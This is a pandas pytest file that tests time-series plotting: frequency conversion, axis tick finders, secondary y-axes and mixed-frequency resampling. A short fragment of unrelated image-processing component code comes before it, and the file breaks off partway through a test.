path_template.render(camera_entity=self._camera_entity)
)
else:
paths.append(path_template)
self._save_image(image, matches, paths)
self._matches = matches
self._total_matches = total_matches
|
|
""" Test cases for time series specific (freq conversion, etc) """
from datetime import (
date,
datetime,
time,
timedelta,
)
import pickle
import numpy as np
import pytest
from pandas._libs.tslibs import (
BaseOffset,
to_offset,
)
import pandas.util._test_decorators as td
from pandas import (
DataFrame,
Index,
NaT,
Series,
isna,
to_datetime,
)
import pandas._testing as tm
from pandas.core.indexes.datetimes import (
DatetimeIndex,
bdate_range,
date_range,
)
from pandas.core.indexes.period import (
Period,
PeriodIndex,
period_range,
)
from pandas.core.indexes.timedeltas import timedelta_range
from pandas.tests.plotting.common import TestPlotBase
from pandas.tseries.offsets import WeekOfMonth
pytestmark = pytest.mark.slow
@td.skip_if_no_mpl
class TestTSPlot(TestPlotBase):
def setup_method(self, method):
TestPlotBase.setup_method(self, method)
self.freq = ["S", "T", "H", "D", "W", "M", "Q", "A"]
idx = [period_range("12/31/1999", freq=x, periods=100) for x in self.freq]
self.period_ser = [Series(np.random.randn(len(x)), x) for x in idx]
self.period_df = [
DataFrame(np.random.randn(len(x), 3), index=x, columns=["A", "B", "C"])
for x in idx
]
freq = ["S", "T", "H", "D", "W", "M", "Q-DEC", "A", "1B30Min"]
idx = [date_range("12/31/1999", freq=x, periods=100) for x in freq]
self.datetime_ser = [Series(np.random.randn(len(x)), x) for x in idx]
self.datetime_df = [
DataFrame(np.random.randn(len(x), 3), index=x, columns=["A", "B", "C"])
for x in idx
]
def teardown_method(self, method):
tm.close()
def test_ts_plot_with_tz(self, tz_aware_fixture):
# GH2877, GH17173, GH31205, GH31580
tz = tz_aware_fixture
index = date_range("1/1/2011", periods=2, freq="H", tz=tz)
ts = Series([188.5, 328.25], index=index)
with tm.assert_produces_warning(None):
_check_plot_works(ts.plot)
ax = ts.plot()
xdata = list(ax.get_lines())[0].get_xdata()
# Check first and last points' labels are correct
assert (xdata[0].hour, xdata[0].minute) == (0, 0)
assert (xdata[-1].hour, xdata[-1].minute) == (1, 0)
def test_fontsize_set_correctly(self):
# For issue #8765
df = DataFrame(np.random.randn(10, 9), index=range(10))
fig, ax = self.plt.subplots()
df.plot(fontsize=2, ax=ax)
for label in ax.get_xticklabels() + ax.get_yticklabels():
assert label.get_fontsize() == 2
def test_frame_inferred(self):
# inferred freq
idx = date_range("1/1/1987", freq="MS", periods=100)
idx = DatetimeIndex(idx.values, freq=None)
df = DataFrame(np.random.randn(len(idx), 3), index=idx)
_check_plot_works(df.plot)
# axes freq
idx = idx[0:40].union(idx[45:99])
df2 = DataFrame(np.random.randn(len(idx), 3), index=idx)
_check_plot_works(df2.plot)
# N > 1
idx = date_range("2008-1-1 00:15:00", freq="15T", periods=10)
idx = DatetimeIndex(idx.values, freq=None)
df = DataFrame(np.random.randn(len(idx), 3), index=idx)
_check_plot_works(df.plot)
def test_is_error_nozeroindex(self):
# GH11858
i = np.array([1, 2, 3])
a = DataFrame(i, index=i)
_check_plot_works(a.plot, xerr=a)
_check_plot_works(a.plot, yerr=a)
def test_nonnumeric_exclude(self):
idx = date_range("1/1/1987", freq="A", periods=3)
df = DataFrame({"A": ["x", "y", "z"], "B": [1, 2, 3]}, idx)
fig, ax = self.plt.subplots()
df.plot(ax=ax) # it works
assert len(ax.get_lines()) == 1 # B was plotted
self.plt.close(fig)
msg = "no numeric data to plot"
with pytest.raises(TypeError, match=msg):
df["A"].plot()
def test_tsplot(self):
_, ax = self.plt.subplots()
ts = tm.makeTimeSeries()
for s in self.period_ser:
_check_plot_works(s.plot, ax=ax)
for s in self.datetime_ser:
_check_plot_works(s.plot, ax=ax)
_, ax = self.plt.subplots()
ts.plot(style="k", ax=ax)
color = (0.0, 0.0, 0.0, 1)
assert color == ax.get_lines()[0].get_color()
def test_both_style_and_color(self):
ts = tm.makeTimeSeries()
msg = (
"Cannot pass 'style' string with a color symbol and 'color' "
"keyword argument. Please use one or the other or pass 'style' "
"without a color symbol"
)
with pytest.raises(ValueError, match=msg):
ts.plot(style="b-", color="#000099")
s = ts.reset_index(drop=True)
with pytest.raises(ValueError, match=msg):
s.plot(style="b-", color="#000099")
def test_high_freq(self):
freaks = ["ms", "us"]
for freq in freaks:
_, ax = self.plt.subplots()
rng = date_range("1/1/2012", periods=100, freq=freq)
ser = Series(np.random.randn(len(rng)), rng)
_check_plot_works(ser.plot, ax=ax)
def test_get_datevalue(self):
from pandas.plotting._matplotlib.converter import get_datevalue
assert get_datevalue(None, "D") is None
assert get_datevalue(1987, "A") == 1987
assert get_datevalue(Period(1987, "A"), "M") == Period("1987-12", "M").ordinal
assert get_datevalue("1/1/1987", "D") == Period("1987-1-1", "D").ordinal
def test_ts_plot_format_coord(self):
def check_format_of_first_point(ax, expected_string):
first_line = ax.get_lines()[0]
first_x = first_line.get_xdata()[0].ordinal
first_y = first_line.get_ydata()[0]
try:
assert expected_string == ax.format_coord(first_x, first_y)
except (ValueError):
pytest.skip(
"skipping test because issue forming test comparison GH7664"
)
annual = Series(1, index=date_range("2014-01-01", periods=3, freq="A-DEC"))
_, ax = self.plt.subplots()
annual.plot(ax=ax)
check_format_of_first_point(ax, "t = 2014 y = 1.000000")
# note this is added to the annual plot already in existence, and
# changes its freq field
daily = Series(1, index=date_range("2014-01-01", periods=3, freq="D"))
daily.plot(ax=ax)
check_format_of_first_point(ax, "t = 2014-01-01 y = 1.000000")
tm.close()
def test_line_plot_period_series(self):
for s in self.period_ser:
_check_plot_works(s.plot, s.index.freq)
@pytest.mark.parametrize(
"frqncy", ["1S", "3S", "5T", "7H", "4D", "8W", "11M", "3A"]
)
def test_line_plot_period_mlt_series(self, frqncy):
# test period index line plot for series with multiples (`mlt`) of the
# frequency (`frqncy`) rule code. tests resolution of issue #14763
idx = period_range("12/31/1999", freq=frqncy, periods=100)
s = Series(np.random.randn(len(idx)), idx)
_check_plot_works(s.plot, s.index.freq.rule_code)
def test_line_plot_datetime_series(self):
for s in self.datetime_ser:
_check_plot_works(s.plot, s.index.freq.rule_code)
def test_line_plot_period_frame(self):
for df in self.period_df:
_check_plot_works(df.plot, df.index.freq)
@pytest.mark.parametrize(
"frqncy", ["1S", "3S", "5T", "7H", "4D", "8W", "11M", "3A"]
)
def test_line_plot_period_mlt_frame(self, frqncy):
# test period index line plot for DataFrames with multiples (`mlt`)
# of the frequency (`frqncy`) rule code. tests resolution of issue
# #14763
idx = period_range("12/31/1999", freq=frqncy, periods=100)
df = DataFrame(np.random.randn(len(idx), 3), index=idx, columns=["A", "B", "C"])
freq = df.index.asfreq(df.index.freq.rule_code).freq
_check_plot_works(df.plot, freq)
def test_line_plot_datetime_frame(self):
for df in self.datetime_df:
freq = df.index.to_period(df.index.freq.rule_code).freq
_check_plot_works(df.plot, freq)
def test_line_plot_inferred_freq(self):
for ser in self.datetime_ser:
ser = Series(ser.values, Index(np.asarray(ser.index)))
_check_plot_works(ser.plot, ser.index.inferred_freq)
ser = ser[[0, 3, 5, 6]]
_check_plot_works(ser.plot)
def test_fake_inferred_business(self):
_, ax = self.plt.subplots()
rng = date_range("2001-1-1", "2001-1-10")
ts = Series(range(len(rng)), index=rng)
ts = ts[:3].append(ts[5:])
ts.plot(ax=ax)
assert not hasattr(ax, "freq")
def test_plot_offset_freq(self):
ser = tm.makeTimeSeries()
_check_plot_works(ser.plot)
dr = date_range(ser.index[0], freq="BQS", periods=10)
ser = Series(np.random.randn(len(dr)), index=dr)
_check_plot_works(ser.plot)
def test_plot_multiple_inferred_freq(self):
dr = Index([datetime(2000, 1, 1), datetime(2000, 1, 6), datetime(2000, 1, 11)])
ser = Series(np.random.randn(len(dr)), index=dr)
_check_plot_works(ser.plot)
def test_uhf(self):
import pandas.plotting._matplotlib.converter as conv
idx = date_range("2012-6-22 21:59:51.960928", freq="L", periods=500)
df = DataFrame(np.random.randn(len(idx), 2), index=idx)
_, ax = self.plt.subplots()
df.plot(ax=ax)
axis = ax.get_xaxis()
tlocs = axis.get_ticklocs()
tlabels = axis.get_ticklabels()
for loc, label in zip(tlocs, tlabels):
xp = conv._from_ordinal(loc).strftime("%H:%M:%S.%f")
rs = str(label.get_text())
if len(rs):
assert xp == rs
def test_irreg_hf(self):
idx = date_range("2012-6-22 21:59:51", freq="S", periods=100)
df = DataFrame(np.random.randn(len(idx), 2), index=idx)
irreg = df.iloc[[0, 1, 3, 4]]
_, ax = self.plt.subplots()
irreg.plot(ax=ax)
diffs = Series(ax.get_lines()[0].get_xydata()[:, 0]).diff()
sec = 1.0 / 24 / 60 / 60
assert (np.fabs(diffs[1:] - [sec, sec * 2, sec]) < 1e-8).all()
_, ax = self.plt.subplots()
df2 = df.copy()
df2.index = df.index.astype(object)
df2.plot(ax=ax)
diffs = Series(ax.get_lines()[0].get_xydata()[:, 0]).diff()
assert (np.fabs(diffs[1:] - sec) < 1e-8).all()
def test_irregular_datetime64_repr_bug(self):
ser = tm.makeTimeSeries()
ser = ser[[0, 1, 2, 7]]
_, ax = self.plt.subplots()
ret = ser.plot(ax=ax)
assert ret is not None
for rs, xp in zip(ax.get_lines()[0].get_xdata(), ser.index):
assert rs == xp
def test_business_freq(self):
bts = tm.makePeriodSeries()
_, ax = self.plt.subplots()
bts.plot(ax=ax)
assert ax.get_lines()[0].get_xydata()[0, 0] == bts.index[0].ordinal
idx = ax.get_lines()[0].get_xdata()
assert PeriodIndex(data=idx).freqstr == "B"
def test_business_freq_convert(self):
bts = tm.makeTimeSeries(300).asfreq("BM")
ts = bts.to_period("M")
_, ax = self.plt.subplots()
bts.plot(ax=ax)
assert ax.get_lines()[0].get_xydata()[0, 0] == ts.index[0].ordinal
idx = ax.get_lines()[0].get_xdata()
assert PeriodIndex(data=idx).freqstr == "M"
def test_freq_with_no_period_alias(self):
# GH34487
freq = WeekOfMonth()
bts = tm.makeTimeSeries(5).asfreq(freq)
_, ax = self.plt.subplots()
bts.plot(ax=ax)
idx = ax.get_lines()[0].get_xdata()
msg = "freq not specified and cannot be inferred"
with pytest.raises(ValueError, match=msg):
PeriodIndex(data=idx)
def test_nonzero_base(self):
# GH2571
idx = date_range("2012-12-20", periods=24, freq="H") + timedelta(minutes=30)
df = DataFrame(np.arange(24), index=idx)
_, ax = self.plt.subplots()
df.plot(ax=ax)
rs = ax.get_lines()[0].get_xdata()
assert not Index(rs).is_normalized
def test_dataframe(self):
bts = DataFrame({"a": tm.makeTimeSeries()})
_, ax = self.plt.subplots()
bts.plot(ax=ax)
idx = ax.get_lines()[0].get_xdata()
tm.assert_index_equal(bts.index.to_period(), PeriodIndex(idx))
def test_axis_limits(self):
def _test(ax):
xlim = ax.get_xlim()
ax.set_xlim(xlim[0] - 5, xlim[1] + 10)
result = ax.get_xlim()
assert result[0] == xlim[0] - 5
assert result[1] == xlim[1] + 10
# string
expected = (Period("1/1/2000", ax.freq), Period("4/1/2000", ax.freq))
ax.set_xlim("1/1/2000", "4/1/2000")
result = ax.get_xlim()
assert int(result[0]) == expected[0].ordinal
assert int(result[1]) == expected[1].ordinal
# datetime
expected = (Period("1/1/2000", ax.freq), Period("4/1/2000", ax.freq))
ax.set_xlim(datetime(2000, 1, 1), datetime(2000, 4, 1))
result = ax.get_xlim()
assert int(result[0]) == expected[0].ordinal
assert int(result[1]) == expected[1].ordinal
fig = ax.get_figure()
self.plt.close(fig)
ser = tm.makeTimeSeries()
_, ax = self.plt.subplots()
ser.plot(ax=ax)
_test(ax)
_, ax = self.plt.subplots()
df = DataFrame({"a": ser, "b": ser + 1})
df.plot(ax=ax)
_test(ax)
df = DataFrame({"a": ser, "b": ser + 1})
axes = df.plot(subplots=True)
for ax in axes:
_test(ax)
def test_get_finder(self):
import pandas.plotting._matplotlib.converter as conv
assert conv.get_finder(to_offset("B")) == conv._daily_finder
assert conv.get_finder(to_offset("D")) == conv._daily_finder
assert conv.get_finder(to_offset("M")) == conv._monthly_finder
assert conv.get_finder(to_offset("Q")) == conv._quarterly_finder
assert conv.get_finder(to_offset("A")) == conv._annual_finder
assert conv.get_finder(to_offset("W")) == conv._daily_finder
def test_finder_daily(self):
day_lst = [10, 40, 252, 400, 950, 2750, 10000]
xpl1 = xpl2 = [Period("1999-1-1", freq="B").ordinal] * len(day_lst)
rs1 = []
rs2 = []
for n in day_lst:
rng = bdate_range("1999-1-1", periods=n)
ser = Series(np.random.randn(len(rng)), rng)
_, ax = self.plt.subplots()
ser.plot(ax=ax)
xaxis = ax.get_xaxis()
rs1.append(xaxis.get_majorticklocs()[0])
vmin, vmax = ax.get_xlim()
ax.set_xlim(vmin + 0.9, vmax)
rs2.append(xaxis.get_majorticklocs()[0])
self.plt.close(ax.get_figure())
assert rs1 == xpl1
assert rs2 == xpl2
def test_finder_quarterly(self):
yrs = [3.5, 11]
xpl1 = xpl2 = [Period("1988Q1").ordinal] * len(yrs)
rs1 = []
rs2 = []
for n in yrs:
rng = period_range("1987Q2", periods=int(n * 4), freq="Q")
ser = Series(np.random.randn(len(rng)), rng)
_, ax = self.plt.subplots()
ser.plot(ax=ax)
xaxis = ax.get_xaxis()
rs1.append(xaxis.get_majorticklocs()[0])
(vmin, vmax) = ax.get_xlim()
ax.set_xlim(vmin + 0.9, vmax)
rs2.append(xaxis.get_majorticklocs()[0])
self.plt.close(ax.get_figure())
assert rs1 == xpl1
assert rs2 == xpl2
def test_finder_monthly(self):
yrs = [1.15, 2.5, 4, 11]
xpl1 = xpl2 = [Period("Jan 1988").ordinal] * len(yrs)
rs1 = []
rs2 = []
for n in yrs:
rng = period_range("1987Q2", periods=int(n * 12), freq="M")
ser = Series(np.random.randn(len(rng)), rng)
_, ax = self.plt.subplots()
ser.plot(ax=ax)
xaxis = ax.get_xaxis()
rs1.append(xaxis.get_majorticklocs()[0])
vmin, vmax = ax.get_xlim()
ax.set_xlim(vmin + 0.9, vmax)
rs2.append(xaxis.get_majorticklocs()[0])
self.plt.close(ax.get_figure())
assert rs1 == xpl1
assert rs2 == xpl2
def test_finder_monthly_long(self):
rng = period_range("1988Q1", periods=24 * 12, freq="M")
ser = Series(np.random.randn(len(rng)), rng)
_, ax = self.plt.subplots()
ser.plot(ax=ax)
xaxis = ax.get_xaxis()
rs = xaxis.get_majorticklocs()[0]
xp = Period("1989Q1", "M").ordinal
assert rs == xp
def test_finder_annual(self):
xp = [1987, 1988, 1990, 1990, 1995, 2020, 2070, 2170]
xp = [Period(x, freq="A").ordinal for x in xp]
rs = []
for nyears in [5, 10, 19, 49, 99, 199, 599, 1001]:
rng = period_range("1987", periods=nyears, freq="A")
ser = Series(np.random.randn(len(rng)), rng)
_, ax = self.plt.subplots()
ser.plot(ax=ax)
xaxis = ax.get_xaxis()
rs.append(xaxis.get_majorticklocs()[0])
self.plt.close(ax.get_figure())
assert rs == xp
def test_finder_minutely(self):
nminutes = 50 * 24 * 60
rng = date_range("1/1/1999", freq="Min", periods=nminutes)
ser = Series(np.random.randn(len(rng)), rng)
_, ax = self.plt.subplots()
ser.plot(ax=ax)
xaxis = ax.get_xaxis()
rs = xaxis.get_majorticklocs()[0]
xp = Period("1/1/1999", freq="Min").ordinal
assert rs == xp
def test_finder_hourly(self):
nhours = 23
rng = date_range("1/1/1999", freq="H", periods=nhours)
ser = Series(np.random.randn(len(rng)), rng)
_, ax = self.plt.subplots()
ser.plot(ax=ax)
xaxis = ax.get_xaxis()
rs = xaxis.get_majorticklocs()[0]
xp = Period("1/1/1999", freq="H").ordinal
assert rs == xp
def test_gaps(self):
ts = tm.makeTimeSeries()
ts[5:25] = np.nan
_, ax = self.plt.subplots()
ts.plot(ax=ax)
lines = ax.get_lines()
assert len(lines) == 1
line = lines[0]
data = line.get_xydata()
if self.mpl_ge_3_0_0 or not self.mpl_ge_2_2_3:
data = np.ma.MaskedArray(data, mask=isna(data), fill_value=np.nan)
assert isinstance(data, np.ma.core.MaskedArray)
mask = data.mask
assert mask[5:25, 1].all()
self.plt.close(ax.get_figure())
# irregular
ts = tm.makeTimeSeries()
ts = ts[[0, 1, 2, 5, 7, 9, 12, 15, 20]]
ts[2:5] = np.nan
_, ax = self.plt.subplots()
ax = ts.plot(ax=ax)
lines = ax.get_lines()
assert len(lines) == 1
line = lines[0]
data = line.get_xydata()
if self.mpl_ge_3_0_0 or not self.mpl_ge_2_2_3:
data = np.ma.MaskedArray(data, mask=isna(data), fill_value=np.nan)
assert isinstance(data, np.ma.core.MaskedArray)
mask = data.mask
assert mask[2:5, 1].all()
self.plt.close(ax.get_figure())
# non-ts
idx = [0, 1, 2, 5, 7, 9, 12, 15, 20]
ser = Series(np.random.randn(len(idx)), idx)
ser[2:5] = np.nan
_, ax = self.plt.subplots()
ser.plot(ax=ax)
lines = ax.get_lines()
assert len(lines) == 1
line = lines[0]
data = line.get_xydata()
if self.mpl_ge_3_0_0 or not self.mpl_ge_2_2_3:
data = np.ma.MaskedArray(data, mask=isna(data), fill_value=np.nan)
assert isinstance(data, np.ma.core.MaskedArray)
mask = data.mask
assert mask[2:5, 1].all()
def test_gap_upsample(self):
low = tm.makeTimeSeries()
low[5:25] = np.nan
_, ax = self.plt.subplots()
low.plot(ax=ax)
idxh = date_range(low.index[0], low.index[-1], freq="12h")
s = Series(np.random.randn(len(idxh)), idxh)
s.plot(secondary_y=True)
lines = ax.get_lines()
assert len(lines) == 1
assert len(ax.right_ax.get_lines()) == 1
line = lines[0]
data = line.get_xydata()
if self.mpl_ge_3_0_0 or not self.mpl_ge_2_2_3:
data = np.ma.MaskedArray(data, mask=isna(data), fill_value=np.nan)
assert isinstance(data, np.ma.core.MaskedArray)
mask = data.mask
assert mask[5:25, 1].all()
def test_secondary_y(self):
ser = Series(np.random.randn(10))
ser2 = Series(np.random.randn(10))
fig, _ = self.plt.subplots()
ax = ser.plot(secondary_y=True)
assert hasattr(ax, "left_ax")
assert not hasattr(ax, "right_ax")
axes = fig.get_axes()
line = ax.get_lines()[0]
xp = Series(line.get_ydata(), line.get_xdata())
tm.assert_series_equal(ser, xp)
assert ax.get_yaxis().get_ticks_position() == "right"
assert not axes[0].get_yaxis().get_visible()
self.plt.close(fig)
_, ax2 = self.plt.subplots()
ser2.plot(ax=ax2)
assert ax2.get_yaxis().get_ticks_position() == self.default_tick_position
self.plt.close(ax2.get_figure())
ax = ser2.plot()
ax2 = ser.plot(secondary_y=True)
assert ax.get_yaxis().get_visible()
assert not hasattr(ax, "left_ax")
assert hasattr(ax, "right_ax")
assert hasattr(ax2, "left_ax")
assert not hasattr(ax2, "right_ax")
def test_secondary_y_ts(self):
idx = date_range("1/1/2000", periods=10)
ser = Series(np.random.randn(10), idx)
ser2 = Series(np.random.randn(10), idx)
fig, _ = self.plt.subplots()
ax = ser.plot(secondary_y=True)
assert hasattr(ax, "left_ax")
assert not hasattr(ax, "right_ax")
axes = fig.get_axes()
line = ax.get_lines()[0]
xp = Series(line.get_ydata(), line.get_xdata()).to_timestamp()
tm.assert_series_equal(ser, xp)
assert ax.get_yaxis().get_ticks_position() == "right"
assert not axes[0].get_yaxis().get_visible()
self.plt.close(fig)
_, ax2 = self.plt.subplots()
ser2.plot(ax=ax2)
assert ax2.get_yaxis().get_ticks_position() == self.default_tick_position
self.plt.close(ax2.get_figure())
ax = ser2.plot()
ax2 = ser.plot(secondary_y=True)
assert ax.get_yaxis().get_visible()
@td.skip_if_no_scipy
def test_secondary_kde(self):
ser = Series(np.random.randn(10))
fig, ax = self.plt.subplots()
ax = ser.plot(secondary_y=True, kind="density", ax=ax)
assert hasattr(ax, "left_ax")
assert not hasattr(ax, "right_ax")
axes = fig.get_axes()
assert axes[1].get_yaxis().get_ticks_position() == "right"
def test_secondary_bar(self):
ser = Series(np.random.randn(10))
fig, ax = self.plt.subplots()
ser.plot(secondary_y=True, kind="bar", ax=ax)
axes = fig.get_axes()
assert axes[1].get_yaxis().get_ticks_position() == "right"
def test_secondary_frame(self):
df = DataFrame(np.random.randn(5, 3), columns=["a", "b", "c"])
axes = df.plot(secondary_y=["a", "c"], subplots=True)
assert axes[0].get_yaxis().get_ticks_position() == "right"
assert axes[1].get_yaxis().get_ticks_position() == self.default_tick_position
assert axes[2].get_yaxis().get_ticks_position() == "right"
def test_secondary_bar_frame(self):
df = DataFrame(np.random.randn(5, 3), columns=["a", "b", "c"])
axes = df.plot(kind="bar", secondary_y=["a", "c"], subplots=True)
assert axes[0].get_yaxis().get_ticks_position() == "right"
assert axes[1].get_yaxis().get_ticks_position() == self.default_tick_position
assert axes[2].get_yaxis().get_ticks_position() == "right"
def test_mixed_freq_regular_first(self):
# TODO
s1 = tm.makeTimeSeries()
s2 = s1[[0, 5, 10, 11, 12, 13, 14, 15]]
# it works!
_, ax = self.plt.subplots()
s1.plot(ax=ax)
ax2 = s2.plot(style="g", ax=ax)
lines = ax2.get_lines()
idx1 = PeriodIndex(lines[0].get_xdata())
idx2 = PeriodIndex(lines[1].get_xdata())
tm.assert_index_equal(idx1, s1.index.to_period("B"))
tm.assert_index_equal(idx2, s2.index.to_period("B"))
left, right = ax2.get_xlim()
pidx = s1.index.to_period()
assert left <= pidx[0].ordinal
assert right >= pidx[-1].ordinal
def test_mixed_freq_irregular_first(self):
s1 = tm.makeTimeSeries()
s2 = s1[[0, 5, 10, 11, 12, 13, 14, 15]]
_, ax = self.plt.subplots()
s2.plot(style="g", ax=ax)
s1.plot(ax=ax)
assert not hasattr(ax, "freq")
lines = ax.get_lines()
x1 = lines[0].get_xdata()
tm.assert_numpy_array_equal(x1, s2.index.astype(object).values)
x2 = lines[1].get_xdata()
tm.assert_numpy_array_equal(x2, s1.index.astype(object).values)
def test_mixed_freq_regular_first_df(self):
# GH 9852
s1 = tm.makeTimeSeries().to_frame()
s2 = s1.iloc[[0, 5, 10, 11, 12, 13, 14, 15], :]
_, ax = self.plt.subplots()
s1.plot(ax=ax)
ax2 = s2.plot(style="g", ax=ax)
lines = ax2.get_lines()
idx1 = PeriodIndex(lines[0].get_xdata())
idx2 = PeriodIndex(lines[1].get_xdata())
assert idx1.equals(s1.index.to_period("B"))
assert idx2.equals(s2.index.to_period("B"))
left, right = ax2.get_xlim()
pidx = s1.index.to_period()
assert left <= pidx[0].ordinal
assert right >= pidx[-1].ordinal
def test_mixed_freq_irregular_first_df(self):
# GH 9852
s1 = tm.makeTimeSeries().to_frame()
s2 = s1.iloc[[0, 5, 10, 11, 12, 13, 14, 15], :]
_, ax = self.plt.subplots()
s2.plot(style="g", ax=ax)
s1.plot(ax=ax)
assert not hasattr(ax, "freq")
lines = ax.get_lines()
x1 = lines[0].get_xdata()
tm.assert_numpy_array_equal(x1, s2.index.astype(object).values)
x2 = lines[1].get_xdata()
tm.assert_numpy_array_equal(x2, s1.index.astype(object).values)
def test_mixed_freq_hf_first(self):
idxh = date_range("1/1/1999", periods=365, freq="D")
idxl = date_range("1/1/1999", periods=12, freq="M")
high = Series(np.random.randn(len(idxh)), idxh)
low = Series(np.random.randn(len(idxl)), idxl)
_, ax = self.plt.subplots()
high.plot(ax=ax)
low.plot(ax=ax)
for line in ax.get_lines():
assert PeriodIndex(data=line.get_xdata()).freq == "D"
def test_mixed_freq_alignment(self):
ts_ind = date_range("2012-01-01 13:00", "2012-01-02", freq="H")
ts_data = np.random.randn(12)
ts = Series(ts_data, index=ts_ind)
ts2 = ts.asfreq("T").interpolate()
_, ax = self.plt.subplots()
ax = ts.plot(ax=ax)
ts2.plot(style="r", ax=ax)
assert ax.lines[0].get_xdata()[0] == ax.lines[1].get_xdata()[0]
def test_mixed_freq_lf_first(self):
idxh = date_range("1/1/1999", periods=365, freq="D")
idxl = date_range("1/1/1999", periods=12, freq="M")
high = Series(np.random.randn(len(idxh)), idxh)
low = Series(np.random.randn(len(idxl)), idxl)
_, ax = self.plt.subplots()
low.plot(legend=True, ax=ax)
high.plot(legend=True, ax=ax)
for line in ax.get_lines():
assert PeriodIndex(data=line.get_xdata()).freq == "D"
leg = ax.get_legend()
assert len(leg.texts) == 2
self.plt.close(ax.get_figure())
idxh = date_range("1/1/1999", periods=240, freq="T")
idxl = date_range("1/1/1999", periods=4, freq="H")
high = Series(np.random.randn(len(idxh)), idxh)
low = Series(np.random.randn(len(idxl)), idxl)
_, ax = self.plt.subplots()
low.plot(ax=ax)
high.plot(ax=ax)
for line in ax.get_lines():
assert PeriodIndex(data=line.get_xdata()).freq == "T"
def test_mixed_freq_irreg_period(self):
ts = tm.makeTimeSeries()
irreg = ts[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 15, 16, 17, 18, 29]]
rng = period_range("1/3/2000", periods=30, freq="B")
ps = Series(np.random.randn(len(rng)), rng)
_, ax = self.plt.subplots()
irreg.plot(ax=ax)
ps.plot(ax=ax)
def test_mixed_freq_shared_ax(self):
# GH13341, using sharex=True
idx1 = date_range("2015-01-01", periods=3, freq="M")
idx2 = idx1[:1].union(idx1[2:])
s1 = Series(range(len(idx1)), idx1)
s2 = Series(range(len(idx2)), idx2)
fig, (ax1, ax2) = self.plt.subplots(nrows=2, sharex=True)
s1.plot(ax=ax1)
s2.plot(ax=ax2)
assert ax1.freq == "M"
assert ax2.freq == "M"
assert ax1.lines[0].get_xydata()[0, 0] == ax2.lines[0].get_xydata()[0, 0]
# using twinx
fig, ax1 = self.plt.subplots()
ax2 = ax1.twinx()
s1.plot(ax=ax1)
s2.plot(ax=ax2)
assert ax1.lines[0].get_xydata()[0, 0] == ax2.lines[0].get_xydata()[0, 0]
# TODO (GH14330, GH14322)
# plotting the irregular first does not yet work
# fig, ax1 = plt.subplots()
# ax2 = ax1.twinx()
# s2.plot(ax=ax1)
# s1.plot(ax=ax2)
# assert (ax1.lines[0].get_xydata()[0, 0] ==
# ax2.lines[0].get_xydata()[0, 0])
def test_nat_handling(self):
_, ax = self.plt.subplots()
dti = DatetimeIndex(["2015-01-01", NaT, "2015-01-03"])
s = Series(range(len(dti)), dti)
s.plot(ax=ax)
xdata = ax.get_lines()[0].get_xdata()
# plot x data is bounded by index values
assert s.index.min() <= Series(xdata).min()
assert Series(xdata).max() <= s.index.max()
def test_to_weekly_resampling(self):
idxh = date_range("1/1/1999", periods=52, freq="W")
idxl = date_range("1/1/1999", periods=12, freq="M")
high = Series(np.random.randn(len(idxh)), idxh)
low = Series(np.random.randn(len(idxl)), idxl)
_, ax = self.plt.subplots()
high.plot(ax=ax)
low.plot(ax=ax)
for line in ax.get_lines():
assert PeriodIndex(data=line.get_xdata()).freq == idxh.freq
def test_from_weekly_resampling(self):
idxh = date_range("1/1/1999", periods=52, freq="W")
idxl = date_range("1/1/1999", periods=12, freq="M")
high = Series(np.random.randn(len(idxh)), idxh)
low = Series(np.random.randn(len(idxl)), idxl)
_, ax = self.plt.subplots()
low.plot(ax=ax)
high.plot(ax=ax)
expected_h = idxh.to_period().asi8.astype(np.float64)
expected_l = np.array(
[1514, 1519, 1523, 1527, 1531, 1536, 1540, 1544, 1549, 1553, 1558, 1562],
dtype=np.float64,
)
for line in ax.get_lines():
assert PeriodIndex(data=line.get_xdata()).freq == idxh.freq
xdata = line.get_xdata(orig=False)
if len(xdata) == 12: # idxl lines
tm.assert_numpy_array_equal(xdata, expected_l)
else:
tm.assert_numpy_array_equal(xdata, expected_h)
tm.close()
def test_from_resampling_area_line_mixed(self):
idxh = date_range("1/1/1999", periods=52, freq="W")
idxl = date_range("1/1/1999", periods=12, freq="M")
high = DataFrame(np.random.rand(len(idxh), 3), index=idxh, columns=[0, 1, 2])
low = DataFrame(np.random.rand(len(idxl), 3), index=idxl, columns=[0, 1, 2])
# low to high
for kind1, kind2 in [("line", "area"), ("area", "line")]:
_, ax = self.plt.subplots()
low.plot(kind=kind1, stacked=True, ax=ax)
high.plot(kind=kind2, stacked=True, ax=ax)
# check low dataframe result
expected_x = np.array(
[
1514,
1519,
1523,
1527,
1531,
1536,
1540,
1544,
1549,
1553,
1558,
1562,
],
dtype=np.float64,
)
expected_y = np.zeros(len(expected_x), dtype=np.float64)
for i in range(3):
line = ax.lines[i]
assert PeriodIndex(line.get_xdata()).freq == idxh.freq
tm.assert_numpy_array_equal(line.get_xdata(orig=False), expected_x)
# check stacked values are correct
expected_y += low[i].values
tm.assert_numpy_array_equal(line.get_ydata(orig=False), expected_y)
# check high dataframe result
expected_x = idxh.to_period().asi8.astype(np.float64)
expected_y = np.zeros(len(expected_x), dtype=np.float64)
for i in range(3):
line = ax.lines[3 + i]
assert PeriodIndex(data=line.get_xdata()).freq == idxh.freq
tm.assert_numpy_array_equal(line.get_xdata(orig=False), expected_x)
expected_y += high[i].values
tm.assert_numpy_array_equal(line.get_ydata(orig=False), expected_y)
# high to low
for kind1, kind2 in [("line", "area"), ("area", "line")]:
_, ax = self.plt.subplots()
high.plot(kind=kind1, stacked=True, ax=ax)
low.plot(kind=kind2, stacked=True, ax=ax)
# check high dataframe result
expected_x = idxh.to_period().asi8.astype(np.float64)
expected_y = np.zeros(len(expected_x), dtype=np.float64)
for i in range(3):
line = ax.lines[i]
assert PeriodIndex(data=line.get_xdata()).freq == idxh.freq
tm.assert_numpy_array_equal(line.get_xdata(orig=False), expected_x)
expected_y += high[i].values
tm.assert_numpy_array_equal(line.get_ydata(orig=False), expected_y)
# check low dataframe result
expected_x = np.array(
[
1514,
1519,
1523,
1527,
1531,
1536,
1540,
1544,
1549,
1553,
1558,
1562,
],
dtype=np.float64,
)
expected_y = np.zeros(len(expected_x), dtype=np.float64)
for i in range(3):
lines = ax.lines[3 + i]
assert PeriodIndex(data=lines.get_xdata()).freq == idxh.freq
tm.assert_numpy_array_equal(lines.get_xdata(orig=False), expected_x)
expected_y += low[i].values
tm.assert_numpy_array_equal(lines.get_ydata(orig=False), expected_y)
def test_mixed_freq_second_millisecond(self):
# GH 7772, GH 7760
idxh = date_range("2014-07-01 09:00", freq="S", periods=50)
